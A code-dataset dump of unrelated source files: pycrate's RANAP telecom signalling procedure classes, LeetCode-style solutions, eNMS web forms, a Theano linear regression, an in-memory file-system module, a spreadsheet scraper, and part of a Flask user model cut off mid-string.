Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSRABRelease\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPEnhancedRelocationComplete(RANAPSigProc):\n \"\"\"Enhanced Relocation Complete: TS 25.413, section 8.44\n \n RNC-initiated\n request-accept, request\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 79: IuSignallingConnectionIdentifier (M)\n - 188: RAB_SetupList_EnhancedRelocCompleteReq (O)\n - 196: IuSignallingConnectionIdentifier (M)\n - 212: GlobalRNC_ID (M)\n - 213: ExtendedRNC_ID (O)\n - 222: GlobalRNC_ID (M)\n - 223: ExtendedRNC_ID (O)\n Extensions:\n - 5: ChosenEncryptionAlgorithm (O)\n - 6: ChosenIntegrityProtectionAlgorithm (O)\n - 203: CSG_Id (O)\n - 235: Cell_Access_Mode (O)\n - 250: HigherBitratesThan16MbpsFlag (O)\n - 262: TunnelInformation (O)\n - 275: LHN_ID (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 190: RAB_SetupList_EnhancedRelocCompleteRes (O)\n - 210: RAB_ToBeReleasedList_EnhancedRelocCompleteRes (O)\n Extensions:\n - 233: UE_AggregateMaximumBitRate (O)\n - 234: CSG_Membership_Status (O)\n - 239: MSISDN (O)\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.enhancedRelocationComplete\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPEnhancedRelocationCompleteConfirm(RANAPSigProc):\n \"\"\"Enhanced Relocation Complete Confirm: TS 25.413, section 8.45\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 35: RAB_FailedList (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.enhancedRelocationCompleteConfirm\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPSRVCCPreparation(RANAPSigProc):\n \"\"\"SRVCC Preparation: TS 25.413, section 8.46\n \n RNC-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n None\n Extensions:\n None\n Outcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 224: EncryptionKey (M)\n - 225: IntegrityProtectionKey (M)\n - 227: SRVCC_Information (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.sRVCCPreparation\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPUERadioCapabilityMatch(RANAPSigProc):\n \"\"\"UE Radio Capability Match: TS 25.413, section 8.47\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n None\n Extensions:\n None\n Outcome:\n IEs:\n - 258: VoiceSupportMatchIndicator (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.ueRadioCapabilityMatch\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPUERegistrationQuery(RANAPSigProc):\n \"\"\"UE Registration Query: TS 25.413, section 8.48\n \n RNC-initiated\n request\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 23: PermanentNAS_UE_ID (M)\n - 79: IuSignallingConnectionIdentifier (M)\n Extensions:\n None\n Outcome:\n IEs:\n - 281: UERegistrationQueryResult (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.ueRegistrationQuery\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPRerouteNASRequest(RANAPSigProc):\n \"\"\"Reroute NAS Request: TS 25.413, section 8.49\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 286: SGSN_Group_Identity (M)\n - 287: P_TMSI (O)\n - 288: [OCTET STRING] (M)\n - 290: UE_Usage_Type (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.rerouteNASRequest\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPPrivateMessageRNC(RANAPSigProc):\n \"\"\"Private Message: TS 25.413\n \n RNC-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.privateMessage\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPPrivateMessageCN(RANAPSigProc):\n \"\"\"Private Message: TS 25.413\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.privateMessage\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\n# initializing all RANAP procedures classes\nRANAPRABAssignment.init()\nRANAPRABReleaseRequest.init()\nRANAPIuReleaseRequest.init()\nRANAPIuRelease.init()\nRANAPRelocationPreparation.init()\nRANAPRelocationResourceAllocation.init()\nRANAPRelocationDetect.init()\nRANAPRelocationComplete.init()\nRANAPRelocationCancel.init()\nRANAPSRNSContextTransfer.init()\nRANAPSRNSDataForwarding.init()\nRANAPSRNSContextForwardToCN.init()\nRANAPSRNSContextForwardToRNC.init()\nRANAPPaging.init()\nRANAPCommonID.init()\nRANAPCNInvokeTrace.init()\nRANAPSecurityModeControl.init()\nRANAPLocationReportingControl.init()\nRANAPLocationReport.init()\nRANAPDataVolumeReport.init()\nRANAPInitialUEMessage.init()\nRANAPDirectTransferCN.init()\nRANAPDirectTransferRNC.init()\nRANAPOverloadControlCN.init()\nRANAPOverloadControlRNC.init()\nRANAPResetCN.init()\nRANAPResetRNC.init()\nRANAPErrorIndConlessCN.init()\nRANAPErrorIndConlessRNC.init()\nRANAPErrorIndCN.init()\nRANAPErrorIndRNC.init()\nRANAPCNDeactivateTrace.init()\nRANAPResetResourceCN.init()\nRANAPResetResourceRNC.init()\nRANAPRABModificationRequest.init()\nRANAPLocationRelatedData.init()\nRANAPInformationTransfer.init()\nRANAPUESpecificInformation.init()\nRANAPDirectInformationTransferCN.init()\nRANAPDirectInformationTransferRNC.init()\nRANAPUplinkInformationTransfer.init()\nRANAPMBSMSessionStart.init()\nRANAPMBMSSessionUpdate.init()\nRANAPMBMSSessionStop.init()\nRANAPMBMSUELinking.init()\nRANAPMBMSRegistration.init()\nRANAPMBMSCNDeregistration.init()\nRANAPMBMSRABEstablishmentInd.init()\nRANAPMBMSRABRelease.init()\nRANAPEnhancedRelocationComplete.init()\nRANAPEnhancedRelocationCompleteConfirm.init()\nRANAPSRVCCPreparation.init()\nRANAPUERadioCapabilityMatch.init()\nRANAPUERegistrationQuery.init()\nRANAPRerouteNASRequest.init()\nRANAPPrivateMessageRNC.init()\nRANAPPrivateMessageCN.init()\n\n# RANAP RNC-initiated connection-oriented signalling procedures dispatcher\nRANAPProcRncDispatcher = {\n 2 : RANAPRelocationPreparation,\n 4 : RANAPRelocationCancel,\n 10 : RANAPRABReleaseRequest,\n 11 : RANAPIuReleaseRequest,\n 12 : RANAPRelocationDetect,\n 13 : RANAPRelocationComplete,\n 18 : RANAPLocationReport,\n 19 : RANAPInitialUEMessage,\n 20 : RANAPDirectTransferRNC,\n 22 : RANAPErrorIndRNC,\n 24 : RANAPSRNSContextForwardToCN,\n 25 : RANAPPrivateMessageRNC,\n 29 : RANAPRABModificationRequest,\n 39 : RANAPMBMSRegistration,\n 41 : RANAPMBMSRABEstablishmentInd,\n 42 : RANAPMBMSRABRelease,\n 43 : RANAPEnhancedRelocationComplete,\n 44 : RANAPEnhancedRelocationCompleteConfirm,\n 46 : RANAPSRVCCPreparation,\n 48 : RANAPUERegistrationQuery\n }\n\n# RANAP CN-initiated connection-oriented signalling procedures dispatcher\nRANAPProcCnDispatcher = {\n 0 : RANAPRABAssignment,\n 1 : RANAPIuRelease,\n 3 : RANAPRelocationResourceAllocation,\n 5 : RANAPSRNSContextTransfer,\n 6 : RANAPSecurityModeControl,\n 7 : RANAPDataVolumeReport,\n 15 : RANAPCommonID,\n 16 : RANAPCNInvokeTrace,\n 17 : RANAPLocationReportingControl,\n 20 : RANAPDirectTransferCN,\n 22 : RANAPErrorIndCN,\n 23 : RANAPSRNSDataForwarding,\n 24 : RANAPSRNSContextForwardToRNC,\n 25 : RANAPPrivateMessageCN,\n 26 : RANAPCNDeactivateTrace,\n 30 : RANAPLocationRelatedData,\n 32 : RANAPUESpecificInformation,\n 35 : RANAPMBSMSessionStart,\n 36 : RANAPMBMSSessionUpdate,\n 37 : RANAPMBMSSessionStop,\n 38 : RANAPMBMSUELinking,\n 40 : RANAPMBMSCNDeregistration,\n 47 : RANAPUERadioCapabilityMatch,\n 49 : RANAPRerouteNASRequest,\n }\n\n# RANAP RNC-initiated connection-less signalling procedures dispatcher\nRANAPConlessProcRncDispatcher = {\n 9 : RANAPResetRNC,\n 21 : RANAPOverloadControlRNC,\n 22 : RANAPErrorIndConlessRNC,\n 27 : RANAPResetResourceRNC,\n 33 : RANAPUplinkInformationTransfer,\n 34 : RANAPDirectInformationTransferRNC,\n }\n\n# RANAP CN-initiated connection-less signalling procedures dispatcher\nRANAPConlessProcCnDispacther = {\n 9 : RANAPResetCN,\n 14 : RANAPPaging,\n 21 : RANAPOverloadControlCN,\n 22 : RANAPErrorIndConlessCN,\n 27 : RANAPResetResourceCN,\n 31 : RANAPInformationTransfer,\n 34 : RANAPDirectInformationTransferCN,\n }\n\n","repo_name":"P1sec/pycrate","sub_path":"pycrate_corenet/ProcCNRanap.py","file_name":"ProcCNRanap.py","file_ext":"py","file_size_in_byte":90235,"program_lang":"python","lang":"en","doc_type":"code","stars":363,"dataset":"github-code","pt":"21"} +{"seq_id":"7551212374","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @return a ListNode\r\n def removeNthFromEnd(self, head, n):\r\n myhead = ListNode(0)\r\n myhead.next = head\r\n now_head = myhead\r\n last_head = myhead\r\n p = head\r\n i = 0\r\n while p:\r\n i += 1\r\n if i == n:\r\n last_head = now_head\r\n now_head = p\r\n i = 0\r\n p = p.next\r\n \r\n if i == n:\r\n last_head.next = last_head.next.next\r\n elif last_head == myhead and i == 0:\r\n return head.next\r\n else:\r\n for j in range(i):\r\n last_head = last_head.next\r\n last_head.next = last_head.next.next\r\n return head\r\n ","repo_name":"cbsheng/fun_acm","sub_path":"leetcode/Remove Nth Node From End of List.py","file_name":"Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23459778229","text":"class Solution(object):\n def myPow(self, x, n):\n \"\"\"\n :type x: float\n :type n: int\n :rtype: float\n \"\"\"\n flag = 0\n if n < 0:\n n = -n\n flag = 1\n res = self.power(x, n)\n return res if flag == 0 else 1/float(res)\n \n def power(self, x, n):\n if n == 0:\n return 1\n if n % 2 == 0:\n temp = self.power(x, n/2)\n return temp * temp\n else:\n temp = self.power(x, n/2)\n return x * temp * temp\n","repo_name":"ynyeh0221/LeetCode-II","sub_path":"50. Pow(x, n).py","file_name":"50. Pow(x, n).py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38125418904","text":"t = int(input())\nwhile t:\n t -= 1\n s = input()\n lens = len(s)\n if lens % 2 == 0 or s[0] == s[1]:\n print(\"NO\")\n else:\n s1 = s[::2]\n ok = True\n for i in range(lens//2 - 1):\n if s1[i] != s1[i+1]:\n ok = False\n break\n print(\"YES\" if ok else \"NO\")","repo_name":"Sudo248/Python-PTIT","sub_path":"so_xem_ke.py","file_name":"so_xem_ke.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13206418290","text":"from wtforms import BooleanField, HiddenField, IntegerField, SelectField, StringField\r\nfrom wtforms.validators import InputRequired\r\nfrom wtforms.widgets import TextArea\r\n\r\nfrom eNMS.forms import BaseForm, configure_relationships\r\nfrom eNMS.forms.fields import DateField, DictField, MultipleInstanceField\r\n\r\n\r\ndef configure_form(cls):\r\n cls.properties = (\"log_source\", \"log_content\")\r\n for property in (\"log_source\", \"log_content\"):\r\n setattr(cls, property, StringField(property))\r\n setattr(cls, property + \"_regex\", BooleanField(\"Regex\"))\r\n return cls\r\n\r\n\r\n@configure_form\r\nclass EventForm(BaseForm):\r\n template = \"event\"\r\n form_type = HiddenField(default=\"event\")\r\n id = HiddenField()\r\n name = StringField(\"Name\", [InputRequired()])\r\n services = MultipleInstanceField(\"Services\")\r\n\r\n\r\n@configure_relationships\r\nclass TaskForm(BaseForm):\r\n template = \"object\"\r\n form_type = HiddenField(default=\"task\")\r\n id = HiddenField()\r\n scheduling_mode = SelectField(\r\n \"Scheduling Mode\",\r\n choices=((\"cron\", \"Crontab Scheduling\"), (\"standard\", \"Standard Scheduling\")),\r\n )\r\n name = StringField(\"Name\", [InputRequired()])\r\n description = StringField(\"Description\")\r\n start_date = DateField(\"Start Date\")\r\n end_date = DateField(\"End Date\")\r\n frequency = IntegerField(\"Frequency\", default=0)\r\n frequency_unit = SelectField(\r\n \"Frequency Unit\",\r\n choices=(\r\n (\"seconds\", \"Seconds\"),\r\n (\"minutes\", \"Minutes\"),\r\n (\"hours\", \"Hours\"),\r\n (\"days\", \"Days\"),\r\n ),\r\n )\r\n crontab_expression = StringField(\"Crontab Expression\")\r\n payload = DictField(\"Payload\")\r\n\r\n def validate(self):\r\n valid_form = super().validate()\r\n no_date = self.scheduling_mode.data == \"standard\" and not self.start_date.data\r\n if no_date:\r\n self.start_date.errors.append(\"A start date must be set.\")\r\n no_cron_expression = (\r\n self.scheduling_mode.data == \"cron\" and not self.crontab_expression.data\r\n )\r\n if no_cron_expression:\r\n self.crontab_expression.errors.append(\"A crontab expression must be set.\")\r\n no_service = not self.service.data\r\n if no_service:\r\n self.service.errors.append(\"No service set.\")\r\n return valid_form and not any([no_date, no_cron_expression, no_service])\r\n\r\n\r\nclass ChangelogForm(BaseForm):\r\n template = \"object\"\r\n form_type = HiddenField(default=\"changelog\")\r\n id = HiddenField()\r\n severity = SelectField(\r\n \"Severity\",\r\n choices=(\r\n (\"debug\", \"Debug\"),\r\n (\"info\", \"Info\"),\r\n (\"warning\", \"Warning\"),\r\n (\"error\", \"Error\"),\r\n (\"critical\", \"Critical\"),\r\n ),\r\n )\r\n content = StringField(widget=TextArea(), render_kw={\"rows\": 8})\r\n","repo_name":"arifh19/eNMS","sub_path":"eNMS/forms/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"8831186923","text":"from __future__ import annotations\n\n\nclass Directory:\n def __init__(self, name: str, parent: Directory, is_root=False):\n self.is_root = is_root\n self.name = name\n self.parent = parent\n # Prevent double //\n if (is_root):\n self.path = \"/\"\n elif (parent.is_root):\n self.path = parent.path + name\n else:\n self.path = parent.path + \"/\" + name\n self.subfolders = {}\n self.files = {}\n\n # Create a sub directory under this directory\n def new_subfolder(self, new_name: str) -> Directory:\n d = Directory(new_name, self)\n self.subfolders[new_name] = d\n return d\n\n # Create new file under this directory\n def new_file(self, file_name: str) -> File:\n f = File(file_name, self)\n self.files[file_name] = f\n return f\n\n # Given an existing file, link it to this directory\n def add_existing_file(self, file: File):\n if (file is None):\n return\n self.files[file.name] = file\n file.parent = self\n\n def get_file(self, file_name: str) -> File:\n if file_name in self.files.keys():\n return self.files[file_name]\n else:\n return None\n\n def get_subfolder(self, subfolder_name: str) -> Directory:\n if subfolder_name in self.subfolders.keys():\n return self.subfolders[subfolder_name]\n else:\n return None\n\n # Removes subfolder, NOOp if doesn't exist.\n def remove_subfolder(self, subfolder_name):\n return self.subfolders.pop(subfolder_name, None)\n\n # Removes file, NOOp if doesn't exist.\n def remove_file(self, file_name: str) -> File:\n return self.files.pop(file_name, None)\n\n # Starting from this dir, invoke an arbitrary func on every folder & file\n # + recursively on every subfolder\n # Return the output of each type (file|folder) as two dicts where\n # dict{key=file/folder-path, val=func output}\n # Output = tuple(dict,dict) correspondg to file-output, folder-output\n\n # e.g. Imagine a tree of / -> file1, dir1; \n # /dir1 -> file2\n # e.g. Output: ({/file1->val1, /dir1/file2->val2} , {/dir1->val3})\n # where the first dict is the output of all file invocations\n # and the second dict is the output of all directory invocations\n def recurse_with_func(self, func: function, args: list) -> tuple[dict, dict]:\n output_files = {}\n output_folders = {}\n for file in self.files.values():\n output_files[file.get_path()] = func(file, *args)\n for dir in self.subfolders.values():\n output_folders[dir.path] = func(dir, *args)\n recurse_output_files, recurse_output_folders = dir.recurse_with_func(\n func, args)\n # merge dicts; no worries about key conflict due to unique pathes as keys\n output_files = {**output_files, **recurse_output_files}\n output_folders = {**output_folders, **recurse_output_folders}\n return (output_files, output_folders)\n\n\nclass File:\n def __init__(self, name: str, parent: Directory):\n self.name = name\n self.contents = \"\"\n self.parent = parent\n # TODO implement read/write lock logic\n # Supports multiple open reads\n self.read_handlers = set()\n # Supports only 1 open write\n self.write_handler = None\n\n def get_path(self) -> str:\n if self.parent.is_root:\n return \"/\"+self.name\n else:\n return self.parent.path + \"/\" + self.name\n\n def copy(self) -> File:\n f = File(self.name, self.parent)\n f.contents = self.contents\n return f\n\n # Deep copy this file in the same dir with new_name\n # returns the new file\n def copy_in_place(self, new_name: str) -> File:\n if (new_name == self.name):\n raise Exception(\"Can't copy file with same name\")\n else:\n f = File(new_name, self.parent)\n self.parent.add_existing_file(f)\n f.contents = self.contents\n return f\n\n# Allows reading and writing of file in chunks\nclass FileHandler:\n def __init__(self, file: File):\n self.file = file\n self.cursor = 0 # Used to maintain current position\n self.is_open = False\n\n # Moves the cursor to absolute index\n # Returns T/F for success/fail\n def move_cursor_abs(self, i: int) -> bool:\n if (i < 0 or i > len(self.file.contents)):\n print(\"Cursor value out of bounds\")\n return False\n self.cursor = i\n return True\n\n # Moves the cursor relative to current index\n # Negative int will move it backward\n # Returns T/F for success/fail\n def move_cursor_rel(self, i: int) -> bool:\n new_pos = self.cursor + i\n if (new_pos < 0 or new_pos >= len(self.file.contents)):\n print(\"Cursor value out of bounds\")\n return False\n self.cursor = new_pos\n return True\n\n # If i is out of bounds, round i to 0 or EoF\n def _round_index(self, i: int) -> int:\n if i > len(self.file.contents):\n i = len(self.file.contents)\n if i < 0:\n i = 0\n return i\n\n\nclass ReadHandler(FileHandler):\n # Read next i chars\n def read_next(self, i: int) -> str:\n if not self.is_open:\n raise Exception(\"Cannot read from unopened handler\")\n new_index = self._round_index(self.cursor+i)\n output = self.file.contents[self.cursor:new_index]\n self.cursor = new_index\n return output\n\n # Read from cursor to end\n def read_to_end(self) -> str:\n if not self.is_open:\n raise Exception(\"Cannot read from unopened handler\")\n output = self.file.contents[self.cursor:]\n self.cursor = len(self.file.contents)\n return output\n\n # Stream output until the next newline starting from cursor\n def read_line(self) -> str:\n if not self.is_open:\n raise Exception(\"Cannot read from unopened handler\")\n output = \"\"\n for i in range(self.cursor, len(self.file.contents)):\n c = self.file.contents[self.cursor]\n output += c\n self.cursor = self._round_index(self.cursor + 1)\n if (c == \"\\n\"):\n break\n return output\n\n # Outputs all file contents, doesn't move cursor\n def read(self) -> str:\n if not self.is_open:\n raise Exception(\"Cannot read from unopened handler\")\n return self.file.contents\n\n # Opening a read handler is always successful\n def open(self) -> bool:\n self.file.read_handlers.add(self)\n self.is_open = True\n self.cursor = 0\n return True\n\n # Close the handler\n def close(self) -> None:\n self.file.read_handlers.remove(self)\n self.is_open = False\n\n\nclass WriteHandler(FileHandler):\n # Overwrites file contents\n def write(self, contents: str) -> None:\n if not self.is_open:\n raise Exception(\"Cannot write with unopened handler\")\n self.file.contents = contents\n self.cursor = len(self.file.contents)\n\n # Appends file contents to end\n def concat(self, contents: str) -> None:\n if not self.is_open:\n raise Exception(\"Cannot write with unopened handler\")\n self.file.contents += contents\n self.cursor = len(self.file.contents)\n\n # Inserts contents at current cursor\n # Cursor now points to cursor + len(contents)\n def insert(self, contents: str) -> None:\n if not self.is_open:\n raise Exception(\"Cannot write with unopened handler\")\n c = self.file.contents\n self.file.contents = c[0:self.cursor] + contents + c[self.cursor:]\n self.cursor = self.cursor + len(contents)\n\n # Open the write handler\n # Returns false if an open one already exists\n\n def open(self) -> bool:\n if (self.file.write_handler is None):\n self.file.write_handler = self\n self.is_open = True\n self.cursor = 0\n return True\n else:\n return False\n\n # Close the handler\n def close(self) -> None:\n self.file.write_handler = None\n self.is_open = False\n","repo_name":"daniell289/material_security","sub_path":"objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32853701991","text":"from celery.task import task\nfrom django.core.cache import cache\nimport uuid\nfrom soil import CachedDownload\nfrom corehq.apps.users.bulkupload import create_or_update_users_and_groups\n\n@task\ndef bulk_upload_async(download_id, domain, user_specs, group_specs, location_specs):\n results = create_or_update_users_and_groups(\n domain,\n user_specs,\n group_specs,\n location_specs\n )\n temp_id = uuid.uuid4().hex\n expiry = 60*60\n cache.set(temp_id, results, expiry)\n cache.set(download_id, CachedDownload(temp_id, content_disposition=\"\",\n mimetype=\"text/html\"), expiry)\n","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/users/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23842035207","text":"from theano import tensor as T, In, function, shared, config\nimport numpy as np\n\nclass linreg(object):\n \"\"\"A quick implementation of Linear Regression\n \"\"\"\n\n def __init__(self):\n self.X = T.scalar('X')\n self.Y = T.scalar('Y')\n self.W = shared(np.asarray(0., dtype=config.floatX), 'W')\n\n self.y = self.X * self.W\n self.cost = T.mean(T.sqr(self.y - self.Y))\n self.gradient = T.grad(cost=self.cost, wrt=self.W)\n self.update = self.W - self.gradient * 0.01\n\n self.train = function(inputs=[self.X, self.Y], outputs=self.cost, updates=[(self.W, self.update)], allow_input_downcast=True, name='train')\n\ndef main():\n #import matplotlib\n #matplotlib.use('TkAgg')\n import matplotlib.pyplot as plt\n\n train_x = np.linspace(-1, 1, 101)\n train_y = 2 * train_x + np.random.randn(*train_x.shape) * 0.33\n\n lr = linreg()\n\n for i in range(100):\n \tfor (x, y) in zip(train_x, train_y):\n \t\tlr.train(x, y)\n\n fig, ax = plt.subplots()\n ax.scatter(train_x, train_y)\n ax.plot(train_x, lr.W.get_value() * train_x, color='red')\n fig.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"smakonin/TheanoFun","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73462773814","text":"import xlrd\n\n#def clean(response):\n\n\ndata = xlrd.open_workbook(\"Responses_All About the RMP2031.xlsx\",\"rb\")\nsheets = data.sheet_names()\nfile=open(\"scraped.txt\",\"w\")\nfor sheet_name in sheets:\n sh = data.sheet_by_name(sheet_name)\n i=0\n for rownum in range(sh.nrows):\n row_val = sh.row_values(rownum)\n if row_val[3]:\n #cleaned = clean(row_val[3])\n file.write(str(i)+ '-' + row_val[3]+'\\n')\n i+=1\n\n","repo_name":"Chintan2108/Text-Classification-and-Context-Mining-for-Document-Summarization","sub_path":"pre/Pre Processing/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"27228987485","text":"# app/models.py\r\nimport base64\r\nimport os\r\nfrom datetime import datetime, timedelta\r\nfrom time import time\r\nfrom hashlib import md5\r\nfrom flask import current_app, redirect, request, url_for\r\nfrom app import db\r\nfrom functools import wraps\r\n\r\n\r\nclass User(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n first_name = db.Column(db.String(64), nullable=False, unique=False)\r\n last_name = db.Column(db.String(64), nullable=False, unique=False)\r\n email = db.Column(db.String(120), index=True, nullable=False, unique=True)\r\n token = db.Column(db.String(120), index=True, nullable=False, unique=True)\r\n token_expire_time = db.Column(db.DateTime, index=True, nullable=False)\r\n created = db.Column(db.DateTime, index=True,\r\n nullable=False, default=datetime.utcnow())\r\n questions = db.relationship(\"UserQuestion\", backref=\"user\", lazy='dynamic')\r\n\r\n def last_answered_question_id(self):\r\n last_answered = (self.questions.filter_by(is_answered=True).order_by(\r\n UserQuestion.question_id.desc())).first()\r\n return last_answered.question_id if last_answered else None\r\n\r\n def get_last_unanswered_question_id(self):\r\n last_unanswered_user_question = (self.questions.filter_by(is_answered=False).order_by(\r\n UserQuestion.question_id.desc())).first()\r\n return last_unanswered_user_question.question_id if last_unanswered_user_question else None\r\n\r\n def get_next_question(self):\r\n next_question = None\r\n last_unanswered_user_question = (self.questions.filter_by(is_answered=False).order_by(\r\n UserQuestion.question_id.desc())).first()\r\n\r\n current_app.logger.debug(\r\n \"[get_next_question] last_unanswered_user_question\")\r\n current_app.logger.debug(last_unanswered_user_question)\r\n\r\n if last_unanswered_user_question:\r\n next_question = db.session.query(Question).filter(\r\n Question.id == last_unanswered_user_question.question_id).first()\r\n else:\r\n last_answered_id = self.last_answered_question_id() or 0\r\n next_question = db.session.query(Question).filter(\r\n Question.id > last_answered_id).order_by(Question.id).first()\r\n\r\n return next_question\r\n\r\n # Sample Answer Format\r\n # {\r\n # \"AnsweredText\": \"42\",\r\n # \"ChildQuestionAnsweredText\": null,\r\n # \"ChildQuestionAnsweredText2\": null,\r\n # \"OptionId\": null,\r\n # \"QuestionId\": \"4\"\r\n # }\r\n\r\n def save_the_answer_to_db(self, answer_data):\r\n answer = None\r\n\r\n user_question_asked = self.questions.filter_by(\r\n question_id=answer_data[\"QuestionId\"]).first()\r\n if user_question_asked is None:\r\n # TODO Throw an error!\r\n current_app.logger.error(\r\n \"[save_the_answer_to_db] Question must be asked before its answered!\")\r\n return\r\n\r\n answered_question = Question.query.filter_by(\r\n id=answer_data[\"QuestionId\"]).first()\r\n\r\n if answered_question is None:\r\n current_app.logger.error(\r\n \"[save_the_answer_to_db] No Question for id \" + answer_data[\"QuestionId\"])\r\n return\r\n\r\n current_app.logger.debug(\"[save_the_answer_to_db] Answered Question\")\r\n current_app.logger.debug(answered_question)\r\n current_app.logger.debug(\"[save_the_answer_to_db] Users Answer\")\r\n current_app.logger.debug(answer_data)\r\n\r\n if answer_data[\"OptionId\"] is not None:\r\n option = answered_question.options.filter(\r\n Option.id == answer_data[\"OptionId\"]).first()\r\n # TODO use this or the user_question.is_correct field\r\n if option is None:\r\n current_app.logger.error(\r\n \"Option, \" + str(answer_data[\"OptionId\"]) + \", doesn't exist for this question!\")\r\n else:\r\n answer = option.body\r\n elif answer_data[\"AnsweredText\"] is not None:\r\n answer = answer_data[\"AnsweredText\"]\r\n elif answer_data[\"ChildQuestionAnsweredText\"] is not None:\r\n answer = answer_data[\"ChildQuestionAnsweredText\"]\r\n elif answer_data[\"ChildQuestionAnsweredText2\"] is not None:\r\n answer = answer_data[\"ChildQuestionAnsweredText2\"]\r\n else:\r\n # TODO re-submit the question, or throw an error?\r\n current_app.logger.error(\"You must answer 